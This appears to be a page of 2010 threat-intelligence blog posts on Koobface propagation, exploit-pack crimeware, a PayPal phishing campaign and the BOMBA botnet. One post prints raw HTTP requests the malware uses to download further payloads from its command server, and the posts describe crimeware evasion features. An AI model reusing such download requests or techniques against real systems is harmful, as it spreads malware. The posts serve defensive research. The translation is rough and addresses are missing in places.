MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.


Circuit Koobface from (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least on typical propagation using as cover to attack the classic fake YouTube screen, is back with another season of propagation.

This time, its spread continues through visual social engineering, but not in the template of course YouTube video but uses a page with pornographic content.

As shown in the catch, when you attempt to access any of the assumptions videos, a small window warns about the need to download a codec. By accepting, you download Koobface under the cover of a binary call codec.exe (5910e59d592781cec3234abf57f8d000), from IP address that resolves domain This IP is used for the propagation of Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file that contains an exploit for CVE-2008-2992.

Also at the same IP but makes it clear that his administration is being performed through a known crimeware: YES Exploit System.

The binary executable codec.exe is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When you turn generates a BAT (she committed suicide) with instructions to C&C, providing access to from which drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive

The BAT contains the following statement of connection and sending information to C&C:

This domain is on the same IP address with instructions to download other malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security essentials 2010. It connects to ( from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) and ( from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) with a very low detection rate.

In short, the circuit that runs koobface from BKCNET "SIA" IZZI involves different parts of the area of crime that are interrelated to each other with the same goal: $$$$$ (feedback to the underground economy), leaving behind a real portfolio malware.

Under is managed by a known crimeware costing underground market around $ 1000 and to be executed in charge of pointing the download of other malware on the victim computer, managed under the coordination of business members that increase their profits for each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s

Ver más


Defacement by "Exploit Pack's"

Defacing attacks, generally attributed to the activities of hacktivism and often called "script kiddies" (although now I think what best describes this kind of bad guys is: aspirant to criminals), passed the criminal background as a sort of whim or complaint against some exploit's pack who have certain vulnerabilities and has already begun to see some examples. However, this does not cut the criminal activities of this botmaster.

The image below shows it’s a "Blind Defacements" against Eleonore Exploit Pack, which means that it can only be viewed using the following botmaster circumvent the authentication process:

In the following case (found by Francisco Ruiz of MalwareIntelligence team), the defacing was made against a SpyEye.

Otros crimeware que podrían ser propensos a esto son:
Among the research community could say that look for vulnerabilities in the crimeware is a common activity and even as a hobby if I may say, aimed at any point of view is to make a defacing. With no doubt, the competition between "fans" of certain crimeware, "patriots" seeking annoy criminal activities by country of origin and other computer thieves who steal "clients" to other thieves computer is becoming extra activities within the ecosystem crime.

Related information
YES Exploit System and Crimeware-as-a-Service
State of the art in Eleonore Exploit Pack IISpyEye Bot (Part two). Conversations with the creator of crimeware
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

Ver más


YES Exploit System and Crimeware-as-a-Service

In recent years the phenomenon Cloud Computing has become a real turning point as far as information security is concerned, the main focus of controversy does not pass both protection mechanisms that can reach their architectures implemented on but more round about the lack of trust still exists on who should take the decisions necessary to implement this style services.

However, undoubtedly, for offenders Cloud Computing security isn't a problem or a constraint to further fuel the underground economy and, in some ways to adapt this technology to offer alternatives "differential" in the competitive scenario posed by crimeware business.

YES Exploit System, one of many systems to automate the exploitation of vulnerabilities to recruit zombies, poses just that.

Using a schema from the visual point of view has nothing to envy to any of the operating systems are supported and used by "the cloud", is confined solely to provide the necessary options for the activities of criminals interest loa . Which makes it clear that the developers of these applications are fully aware of their criminal needs "clients."

Even implementing mechanisms counterintelligence whose objectives are to, first, check the reputation of the domain (Domain checker) used for maneuvers criminal automatically checked against the main services that are responsible for adding a database of URL's fraudulent; including ZeuS Tracker, friends of MDL (MalwareDomainList), SiteAdvisor, Norton List, etc., besides being able to manually add any other default not included manipulating the code of certain files.

On the other, checking the integrity of malware spread (AV Checker). Both "criminal remedies" born as a result of high growth and demand for these types of crimeware.

One of the latest campaigns through the latest YES Exploit System was the spread of family ransomware seen in the image:

Chronologically speaking, this crimeware has three generations and the business model was no longer just a matter operated from hiding underground to certain forums, in addition, make sales through partners, via the web and using as the main channel Communication: ICQ.

YES Exploit System closely resembles a conventional business scheme but designed exclusively for criminal purposes. Even if we consider that among the many resources generated to support the already crimeware (DBaaS) DataBase-as-a-Service should not be surprised to find among the research process, the support of the "customer base" of YES-ES (or otherwise), also from "the cloud" and hosted by a "third."

Related information
YES Exploit System. Manipulando la seguridad del atacante
YES Exploit System. Otro crimeware made in Rusia

Ver más


PayPal phishing campaign by "Newbie Hacker Community"

Phishing attacks are increasingly common and are no longer confined as in the beginning to use as cover only banks, and any service offered over the Internet and requires username and password, sooner or later will be grounds target for criminals.

PayPal isn't a new service and was one of the first to offer e-commerce services, whose image is one of the most commonly used for phishing. Starting today, July 4 (Independence Day U.S.) has been active phishing a massive campaign against PayPal.

Some of the addresses used are:

Behind these attacks was a group of criminals who under the name "Newbie Hacker Community" is the campaign against phishing.

The Defacing seen in the image is as a seal of the executives in each of the sites involved which holds the fake PayPal page along with the fraudulent file package.

Updated 04.07.2010
New active domains. Unlike the first "litter" of vulnerable sites, in this case the phishing package is housed in the folder /~radiocon/ and all they implanted a backdoor (PHP Shell) through uk.php file.

Related information
Besouro film website violated, PayPal phishing attacks
Campaign phishing to Claro Argentina
Phishing database VI
Web Hooters Germany committed to phishing HSBC
New phishing campaign against Facebook led by Zeus
Phishing campaign aimed at players Zynga
Dissection of a fraudulent package. Wachovia phishing attack

Ver más


BOMBA Botnet. New alternative crimeware fuel the economy criminal

In a recent survey, Francisco Ruiz, Crimeware Researcher of MalwareIntelligence, broke through the security barriers of a new recruit crimeware designed to automate the running zombies and mass and scale of cyber crimes that are carried out using a vector of attack committed teams as part of the botnet.

These BOMBA, which is accessed via web and which authentication system is based only on the requirement of a password, an access system adopted by many applications of this kind between highlighting Phoenix Exploit's Kit and n0ise Bot.

The server that hosts this crimeware has base in Latvia (although the administrative record is in Moscow, Russia) under the AS6851 (Autonomous System) which is known as the network BKCNET "SIA" Izzie.

ASN This server is listed as criminal activities such as the spread of rogue, shelter kits and other YES Exploit System, in 2009 I host the strategies of the botnet Waledac (successor to Storm), ZeuS and also to have direct relationship with criminals who are behind the maneuvers of the botnet Koobface.

The package is designed to exploit vulnerabilities through the family of Microsoft operating systems, as shown in the illustration below, Windows XP, Windows Vista and Windows Seven, and through precompiled exploits to exploit vulnerabilities in Java (Java Deployment Toolkit ), Internet Explorer, Adobe Reader and the classic MDAC.

While it does not pose an alternative complex in structure, no longer a serious threat adds to demand criminal and inserted into the circuit of illegal actions.

Related Information

Ver más